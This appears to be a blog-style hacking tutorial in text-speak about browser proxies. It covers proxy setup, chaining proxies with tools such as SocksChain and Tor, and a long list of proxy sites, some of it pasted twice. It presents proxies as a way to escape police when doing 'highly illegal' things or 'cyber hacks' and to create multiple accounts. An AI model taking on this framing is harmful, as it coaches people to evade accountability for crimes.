der r many softwares 4 dis purpose.all of dem r shit nd nothing else.
der is anonyomous proxy list verifier named software nd many more ,all of dem do d same work.i don think any1 should use dem.
u can do d above said work in a more simple way also.
simpally open http://www.proxy4free.com/ named site.
der in most left side u vl see written "proxy list"
in proxy list der vl be many lists named list 1list 2 list 3 nd many more .simpally go on list 1 nd copy ip nd port no.l 4m der
nw i will tell u about proxy flooding :-
this is well explained frm its name
however i will tell u
in this case u have done many proxy 1 after the other
this will be well explained frm the bellow chain (think that u r sending data to google)
YOU'R SERVER ----------> 1ST PROXY SERVER ---------2ND PROXY SERVER --------> THIRD PROXY SERVER --------->and so on -------> g mail server
name of tools 4 doing proxy floding-->
SocksChain,happy browser tool,multiproxy,tor
these are d tools 4 doing proxy flooding,wen u r doing something highly illegal then first of all use any1 of dese softwares nd nw do vatever u vanna do .now u r very much safe/
tool "multiproxy"is a very very very good tool
90+ Proxy Websites To Access Blocked Websites
http://www.hidemyass.com
http://www.anonymizer.com
http://www.wujie.net
http://www.ultrareach.net
http://surfshield.net
http://www.guardster.com/subscription/proxy_free.php
http://anonymouse.ws/anonwww.html
http://www.browser-x.com
http://www.spysurfing.com
http://www.xerohour.org/hideme
http://www.proxyz.be
http://www.sc0rian.com/prox
https://www.proxify.us
http://kproxy.com/index.jsp
http://www.brawl-hall.com/pages/proxy.php
http://www.proxify.net
http://proxy.computersteroids.com/index0.php
http://www.unipeak.com
http://flyproxy.com
http://alienproxy.com
http://proxify.com/
http://www.unfilter.net
http://www.proxymouse.com
http://www.surfonym.com/cgi-bin/nph-proxy
http://www.superproxy.be/browse.pl
http://www.websiteguru.com/mrnewguy
http://www.letsproxy.com
http://www.fsurf.com
http://indianproxy.com
http://www.letmeby.com
http://Boredatschool.net
http://www.ibypass.org
http://www.ipzap.com/
https://proxify.biz
http://kproxy.com/index.jsp
http://www.attackcensorship.com/attack-censorship.html
http://mrnewguy.com
http://www.evilsprouts.co.uk/defilter
http://www.proxify.info
http://www.torify.com
http://www.switchproxy.com
http://www.proxifree.com
http://www.secure-tunnel.com/
http://www.proxify.cn
http://www.arnit.net/utilities/webproxy/new
http://www.proxify.co.uk
http://www.betaproxy.com
http://www.proxify.org
http://www.proxychoice.com
http://www.proxysnail.com
http://www.anonypost.com
http://www.thestrongestlinks.com
http://www.hujiko.com
http://www.anonproxy.info
http://www.peoplesproxy.com
http://www.freeproxy.us
http://www.proxyweb.net
http://www.nopath.com
http://urlencoded.com
http://www.pole.ws
http://www.browseany.com
http://www.spiderproxy.com
http://www.clickcop.com
http://www.sneakysurf.com
http://www.mywebtunnel.com
http://www.thewebtunnel.com
http://www.3proxy.com
http://www.yourfreeproxy.com
http://www.proxy7.com
http://www.fireprox.com
http://www.stupidcensorship.com
http://www.letsproxy.com
http://www.sneak2.com
http://www.cecid.com
http://www.freeproxy.ca
http://www.ibypass.org
http://www.goproxing.com
http://www.projectbypass.com/
http://www.ipsecret.com
http://www.nomorelimits.net
http://www.proxify.de
http://www.bywhat.com
http://www.snoopblocker.com
http://www.anonymizer.ru
http://www.proxyking.net/
http://www.perlproxy.com
http://www.proxylord.com
http://tntproxy.com
http://satanproxy.com
http://zombieinvasion.info
http://demonproxy.com
http://www.myfreeproxy.com
http://www.gezcem.com/nph-proxy.pl.old
http://mpleger.de
http://www.the-cloak.com/login.html
i know having all dese names in ur mind is impossible.
do 1 thinng only memorise
proxy.org and proxy4free.com
summary of d chapter.
[1]proxy is done 4 being safe while doing illegal stuffs nd 4 bypassing firewalls.it is a very good option 2 download multiple files 4m rapidshare at any single moment.
[2]get proxy server lists nd apply these address in ur browser 2 surf d web anonymously
i think i have well explained proxy
doing proxy
proxy is changing ur ip adress
as i already told u that your ip address is d unique address on vch data r sent 2 you
nw think that if u r doing any wrong work then what will get pollice to you'r hame . it's you'r
ip address ..... so if u tell the web wrong ip address then police will go to any other's ip address
and u will be safe...
we get many benefits from proxy.
[1]we can download multiple files 4m rapidshare
[2]by dis we can bypass a firewall
[3] der r many sites vch allows only one account on 1 ip address,on dose sites we can make multiple ids by dis.
[4]4 being safe while doing cyber hackes,it is very much essential 2 do proxy.
[5]after of doing proxy,we can fool other person very easily.
learning proxy is very imp. bcoz while doing cyber hacks it makes u some safe
lemme tel u something about working of proxy.
U------>SENDING DATA 2 GMAIL------->GMAIL REPLYING 2 U
AFTER OF DOING PROXY THIS THING LOOKS SOMETHING LIKE DIS
U---->PROXY SERVER--->GMAIL SERVER------>PROXY SRVER-->U
NW i think u hv got d idea of proxy
for doing proxy follow these simple steps----->>>>>
AS I TOLD U PREVIOUSLY PROXY IS Changing ur ip address.it is very much easy.
first of al write in google"list of proxy address" or u may search 4 "free proxy server"
nw many links will come.go on any1 of them.
now on that website u vl find many ip address nd port no.s.
these r d adress of proxy servers.now copy any1 of de address.mind it,u hv 2 copy both d things,i mean port no. as well as ip address.
now open ur internet explorer nd go in
tools>internet option>connection>lan setting
go in lan setting,der u vl see 2 blue lines.one is AUTOMATIC CONFIGURATION ND d second one is PROXY SERVER
in proxy server named tab u vl see 4 blocks.2 for ticking nd 2 for giving address.tick both of dem boxes nd in address put d ip adress u copied nd in port no. put d port no. u copied.never forget 2 tick both d boxes .now click o.k.
nw open whatismyip.com
nd u vl see dt ur ip address has been chANged.
in mozilla firefox go here
tools>options>advanced>network>settings
nd in settings put d ip address nd port no.
dis is d same operation vch is carried out in all type of browser.
der r many softwares 4 dis purpose.all of dem r shit nd nothing else.
der is anonyomous proxy list verifier named software nd many more ,all of dem do d same work.i don think any1 should use dem.
u can do d above said work in a more simple way also.
simpally open http://www.proxy4free.com/ named site.
der in most left side u vl see written "proxy list"
in proxy list der vl be many lists named list 1list 2 list 3 nd many more .simpally go on list 1 nd copy ip nd port no.l 4m der
nw i will tell u about proxy flooding :-
this is well explained frm its name
however i will tell u
in this case u have done many proxy 1 after the other
this will be well explained frm the bellow chain (think that u r sending data to google)
YOU'R SERVER ----------> 1ST PROXY SERVER ---------2ND PROXY SERVER --------> THIRD PROXY SERVER --------->and so on -------> g mail server
name of tools 4 doing proxy floding-->
SocksChain,happy browser tool,multiproxy,tor
these are d tools 4 doing proxy flooding,wen u r doing something highly illegal then first of all use any1 of dese softwares nd nw do vatever u vanna do .now u r very much safe/
tool "multiproxy"is a very very very good tool
90+ Proxy Websites To Access Blocked Websites
http://www.hidemyass.com
http://www.anonymizer.com
http://www.wujie.net
http://www.ultrareach.net
http://surfshield.net
http://www.guardster.com/subscription/proxy_free.php
http://anonymouse.ws/anonwww.html
http://www.browser-x.com
http://www.spysurfing.com
http://www.xerohour.org/hideme
http://www.proxyz.be
http://www.sc0rian.com/prox
https://www.proxify.us
http://kproxy.com/index.jsp
http://www.brawl-hall.com/pages/proxy.php
http://www.proxify.net
http://proxy.computersteroids.com/index0.php
http://www.unipeak.com
http://flyproxy.com
http://alienproxy.com
http://proxify.com/
http://www.unfilter.net
http://www.proxymouse.com
http://www.surfonym.com/cgi-bin/nph-proxy
http://www.superproxy.be/browse.pl
http://www.websiteguru.com/mrnewguy
http://www.letsproxy.com
http://www.fsurf.com
http://indianproxy.com
http://www.letmeby.com
http://Boredatschool.net
http://www.ibypass.org
http://www.ipzap.com/
https://proxify.biz
http://kproxy.com/index.jsp
http://www.attackcensorship.com/attack-censorship.html
http://mrnewguy.com
http://www.evilsprouts.co.uk/defilter
http://www.proxify.info
http://www.torify.com
http://www.switchproxy.com
http://www.proxifree.com
http://www.secure-tunnel.com/
http://www.proxify.cn
http://www.arnit.net/utilities/webproxy/new
http://www.proxify.co.uk
http://www.betaproxy.com
http://www.proxify.org
http://www.proxychoice.com
http://www.proxysnail.com
http://www.anonypost.com
http://www.thestrongestlinks.com
http://www.hujiko.com
http://www.anonproxy.info
http://www.peoplesproxy.com
http://www.freeproxy.us
http://www.proxyweb.net
http://www.nopath.com
http://urlencoded.com
http://www.pole.ws
http://www.browseany.com
http://www.spiderproxy.com
http://www.clickcop.com
http://www.sneakysurf.com
http://www.mywebtunnel.com
http://www.thewebtunnel.com
http://www.3proxy.com
http://www.yourfreeproxy.com
http://www.proxy7.com
http://www.fireprox.com
http://www.stupidcensorship.com
http://www.letsproxy.com
http://www.sneak2.com
http://www.cecid.com
http://www.freeproxy.ca
http://www.ibypass.org
http://www.goproxing.com
http://www.projectbypass.com/
http://www.ipsecret.com
http://www.nomorelimits.net
http://www.proxify.de
http://www.bywhat.com
http://www.snoopblocker.com
http://www.anonymizer.ru
http://www.proxyking.net/
http://www.perlproxy.com
http://www.proxylord.com
http://tntproxy.com
http://satanproxy.com
http://zombieinvasion.info
http://demonproxy.com
http://www.myfreeproxy.com
http://www.gezcem.com/nph-proxy.pl.old
http://mpleger.de
http://www.the-cloak.com/login.html
i know having all dese names in ur mind is impossible.
do 1 thinng only memorise
proxy.org and proxy4free.com
summary of d chapter.
[1]proxy is done 4 being safe while doing illegal stuffs nd 4 bypassing firewalls.it is a very good option 2 download multiple files 4m rapidshare at any single moment.
[2]get proxy server lists nd apply these address in ur browser 2 surf d web anonymously
i think i have well explained proxy
Subscribe to:
Posts (Atom)